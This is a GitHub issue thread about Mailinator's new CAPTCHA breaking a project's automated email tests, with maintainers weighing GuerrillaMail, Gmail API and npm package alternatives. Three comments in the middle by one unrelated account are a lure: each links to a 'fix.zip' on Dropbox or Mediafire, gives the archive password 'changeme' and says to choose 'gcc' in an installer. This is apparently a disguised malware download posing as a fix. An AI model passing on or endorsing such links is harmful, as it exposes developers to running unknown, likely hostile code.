### ISSUE TITLE
Mailinator no longer working for automated tests

### ISSUE THREAD

**Issue by hahn-kev** [sillsdev/languageforge-lexbox#1034]
**Describe the bug**
All our tests that depend on mailinator fail because they now have captcha in place to avoid automation. This means we need to come up with another solution, there's a verified pro tier on mailinator that might work for us, but that's only for a single user, so I'm not sure it'll work for us.

**To Reproduce**
Run playwright email tests against staging, see that they mostly all fail

**Expected behavior**
our tests should pass just fine

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hahn-kev** [comment]
one solution would be to great a gmail account, and generate an auth token to use the gmail API to fetch our emails.

**Comment by myieye** [comment]
It looks like yopmail has CAPTCHA too.
guerrillamail has a [weird API](https://www.guerrillamail.com/GuerrillaMailAPI.html).
This seemed to more or less work:
1. `Invoke-WebRequest -Uri "https://api.guerrillamail.com/ajax.php?f=set_email_user&email_user=lexbox-text-address@sharklasers.com"`
2. Get the `sid_token` from the response json
3. `(Invoke-WebRequest -Uri "https://api.guerrillamail.com/ajax.php?f=check_email&seq=0&sid_token={sid_token}").Content` (only worked the first time after steps 1 and 2)

**Comment by myieye** [comment]
I just found https://www.npmjs.com/package/e2e-mailbox.
It's an API for getting an email addressing and read mail from DeveloperMail and/or GuerrillaMail (based on your configuration, but falling back to the other one if one is not available).

Sounds perfect, so I'm giving it a try.
